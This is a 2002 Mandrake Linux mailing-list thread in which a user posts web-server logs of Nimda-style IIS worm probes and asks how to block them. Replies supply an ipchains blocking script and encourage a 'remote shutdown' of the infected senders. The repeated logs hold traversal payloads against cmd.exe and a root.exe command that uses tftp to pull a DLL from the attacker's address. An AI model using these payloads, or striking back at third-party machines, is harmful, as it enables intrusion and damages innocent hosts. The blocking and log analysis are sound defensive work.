Re: [newbie] Can't block dos attack
Many thanks for the info Hey, where did it talk about remote shutdown? I saw no such reference. But I do like the auto-responder and e mailing alerter. I'm trying to figure out how to make it work. I will e mail again when I get some results, I'm still being hit and I don't know how to stop them. __ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
[newbie] Can't block dos attack
I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point accross? 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - __ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
Re: [newbie] Can't block dos attack
Try the script below, which should take care of the problem. Of course, this isn't a dos attack, it's a virus attack (one of the viruses going around attempting to infect an iis server). Which kernel are you using? If it's 2.4.x, iptables is the way to block things out. (in that case let me know, and I'll adapt this to deal with iptables). Michael -- Begin Script -- #!/bin/sh # # Block sites which originate Nimba queries from Apache server # Apache must be configured with HostnameLookups Off # Adapted from an earlier script found on one of the Mandrake lists # Changes by Michael Viron # Last Update: 2/20/2002 LOGS=/var/log/httpd # Change IP to reflect yours. DESTINATION = 192.168.1.1 cd $LOGS grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null | awk '/system32\/cmd\.exe/ {sub(/[^:]*:/,);print $1}' | sort -u | while read host do if ! fgrep $host /var/tmp/blocked /dev/null then echo $host /var/tmp/blocked /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY /etc/ipchains.add fi done # Block sites which originate Nimbda queries from Apache server # Apache must be configured with HostnameLookups Off #LOGS=/var/log/httpd #cd $LOGS grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null | awk '/scripts\/Admin\.dll/ {sub(/[^:]*:/,);print $1}' | sort -u | while read host do if ! fgrep $host /var/tmp/blocked /dev/null then echo $host /var/tmp/blocked /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY /etc/ipchains.add fi done grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null | awk '/MSACD\/Admin\.dll/ {sub(/[^:]*:/,);print $1}' | sort -u | while read host do if ! fgrep $host /var/tmp/blocked /dev/null then echo $host /var/tmp/blocked /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY /etc/ipchains.add fi done grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null | awk '/scripts\/root\.exe/ {sub(/[^:]*:/,);print $1}' | sort -u | while read host do if ! fgrep $host /var/tmp/blocked /dev/null then echo $host /var/tmp/blocked /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY /etc/ipchains.add fi done grep '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2/dev/null | awk '/default\.ida/ {sub(/[^:]*:/,);print $1}' | sort -u | while read host do if ! fgrep $host /var/tmp/blocked /dev/null then echo $host /var/tmp/blocked /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY echo -A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY /etc/ipchains.add fi done cat /etc/ipchains.add /etc/sysconfig/ipchains /etc/rc.d/init.d/ipchains restart rm -f /etc/ipchains.add -- End Script -- At 05:29 PM 7/28/2002 -0700, you wrote: I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point accross? 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s ystem32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc. dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET
Re: [newbie] Can't block dos attack
Ibly Piblo wrote: I am getting strange hits to my web server, I don't like it and I wish to know how to stop them from slipping past my defenses. I try using ipchains, most addresses are blocked, but for reasons I can't figure out, this address 65.192.23.150 keeps showing up. I don't understand it, if ipchains, /etc/hosts.deny can't block it, what can? Do I send back a command to shut down their server? How do I get the point accross? 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /scripts/httpodbc.dll HTTP/1.0 404 307 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+dir HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0 200 87 - - 65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] GET /MSADC/httpodbc.dll HTTP/1.0 404 305 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 311 - - 65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 342 - - 65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 358 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 324 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 400 308 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - - 65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 325 - That is no DoS attack--tis the wailing of IIS infected trying to spread its misery. Go here... Tis time to meet a friend. http://pfortin.com/Linux/MSVTS/ And yes the remote shutdown is there. While you are at it, you might want to make some more new friends http://plf.zarb.org Civileme Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com